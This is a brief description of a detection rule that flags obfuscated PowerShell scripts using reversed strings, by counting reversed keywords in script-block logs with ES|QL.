This detection rule identifies PowerShell scripts that utilize reversed strings for obfuscation, a tactic often employed by attackers to avoid static analysis and circumvent security measures such as the Antimalware Scan Interface (AMSI). The rule runs on the PowerShell operational logs and specifically targets event codes associated with script block logging. By using the ES|QL MATCH operator, it efficiently searches for specific keywords that have been reversed and can potentially indicate malicious behavior. Upon detecting such patterns, the rule counts their occurrences and raises alerts if the count exceeds a defined threshold, highlighting the use of obfuscation techniques typical of threat actors.